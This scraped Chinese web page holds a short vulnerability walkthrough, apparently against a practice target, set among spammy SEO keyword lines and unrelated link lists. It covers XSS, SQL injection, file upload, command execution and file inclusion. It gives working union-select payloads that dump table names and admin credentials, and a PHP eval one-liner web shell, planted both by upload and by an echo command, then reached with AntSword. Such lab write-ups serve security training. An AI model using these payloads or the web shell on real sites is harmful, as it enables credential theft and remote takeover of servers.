当前位置: 首页 > news >正文

wordpress做过的大型网站网站跟客户端推广怎么做

wordpress做过的大型网站,网站跟客户端推广怎么做,网站代码建设+实例,营销型网站建设的目的寻找漏洞 一,我们打开页面 第一个漏洞 xss漏洞 1.在登录页面显示有弹窗 第二个漏洞 sql注入漏洞 1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点 2.查看数据库表名 -1 union select 1,database(),3# 3.查看表名 -1 union select 1,2,group…

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.yayakq.cn/news/89823/

相关文章:

  • 易企秀可以做网站吗怎么做网页反向链接
  • 重庆电脑网站建设wordpress编辑慢
  • 网站建设 武讯科技租号网站开发
  • 家居企业网站建设新闻wordpress 视差效果
  • 网站地图的重要性游戏制作专业
  • 姜堰网站建设安徽省工程信息网官网
  • 怎么查看网站提交百度的度汽车网站开发
  • php购物网站开发开发多久中文wordpress
  • 新闻类的手机网站怎么做上海龙腾vs山东鲁能
  • 好f123网站微机做网站的软件
  • 做网站用html还是php东莞seo全网营销
  • 青县网站建设咨询福州外贸网站建设推广
  • 描述出你要建设网站的主题怎样开通app软件
  • WordPress pdo mysql北京公交yy优化
  • 哪一个网站可以做专利检索报告服装设计学院
  • wordpress主题制作全过程(三):html静态模板制作wordpress seo 自定义结构
  • 开发网站费用做网站是干什么用的
  • 中国建设银行网站首页旧版网站用免费空间好不好
  • 帝国软件怎么做网站台州外贸网站建设
  • 网站搭建和网站开发施工企业的施工生产计划与建设
  • 建设银行的网站用户名是什么问题近期军事新闻事件
  • 重庆建设网站哪家好wordpress 热门主题
  • 网站推广策划思路的内容网络运维主要做什么
  • 魔站建站系统哪家好苏州高端网站建设定制
  • 怎么把html模板导入wordpressseo案例分析100例
  • 延安市城乡建设局网站企业邮箱哪家比较好
  • 手机网站营销页如何识别网站的建站程序
  • 网站建设金网科技asp网站建设专家
  • 做网站需要几个服务器泰安互联网公司
  • 赔率网站怎么做中国建筑总公司网站